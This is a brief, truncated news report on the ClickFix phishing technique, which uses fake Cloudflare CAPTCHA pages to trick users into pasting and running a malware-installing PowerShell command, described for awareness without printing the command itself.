A recent research by SlashNext says the technique, called ClickFix tricks users into running commands that deploy malware. ClickFix shows a fake version of Cloudflare’s Turnstile CAPTCHA page. It replicates visual layout and technical elements like Ray ID identifier to look authentic.
Prompt that users generally miss
The phishing site is hosted on a domain that looks like the real one, or an authentic website that has been attacked. When users visit the site, they are tricked into checking a box called “Verify you are human.”
This step looks normal and doesn’t raise any suspicion but after this, the users are asked to run a series of commands such as “Win + R” then “Ctrl + V” and after that “Enter.” These steps look harmless but they use a PowerShell command. Once executed, it can extract malware such as Lumma, NetSupport Manager, and Stealc.
According to security expert Daniel Kelley, “ClickFix is a social engineering attack that tricks users into running malicious commands on their own devices – all under the guise of a routine security check.” ClickFix is dangerous because it uses standard security measures as attack tools.
Experts call this “ve
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.